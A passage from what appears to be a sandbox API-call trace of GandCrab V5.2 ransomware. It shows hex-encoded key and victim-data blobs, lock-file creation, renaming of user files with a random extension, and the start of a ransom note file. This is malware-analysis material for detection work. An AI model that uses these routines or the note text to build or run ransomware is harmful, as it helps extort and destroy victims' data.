4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0070.362] WriteFile (in: hFile=0x2c4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259eab8, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259eab8*=0x2162, lpOverlapped=0x0) returned 1 [0070.363] CloseHandle (hObject=0x2c4) returned 1 [0070.363] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.363] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.363] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xf, wMilliseconds=0x2ac)) [0070.363] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.364] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0070.364] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0070.364] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a09d2ca4deb61a.lock") returned 101 [0070.364] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0070.365] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.366] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\") returned 77 [0070.366] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*" [0070.366] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x5037b8 [0070.366] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0070.366] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.367] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0070.367] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0070.367] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.367] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0070.367] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0070.367] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a09d2ca4deb61a.lock" [0070.367] lstrlenW (lpString=".titwmvjl") returned 9 [0070.367] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a09d2ca4deb61a.lock") returned 101 [0070.367] VirtualAlloc (lpAddress=0x0, dwSize=0x10a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.367] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 110 [0070.367] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\d2ca4a09d2ca4deb61a.lock") returned 101 [0070.367] lstrlenW (lpString=".lock") returned 5 [0070.367] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0070.367] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0070.367] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.368] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.368] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0070.368] lstrcmpW (lpString1="support", lpString2=".") returned 1 [0070.368] lstrcmpW (lpString1="support", lpString2="..") returned 1 [0070.368] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\", lpString2="support" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support" [0070.368] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\" [0070.368] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0070.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.368] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0070.368] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0070.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0070.369] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0070.369] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0070.369] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.369] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0070.369] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\TITWMVJL-DECRYPT.txt") returned 106 [0070.369] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0070.370] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2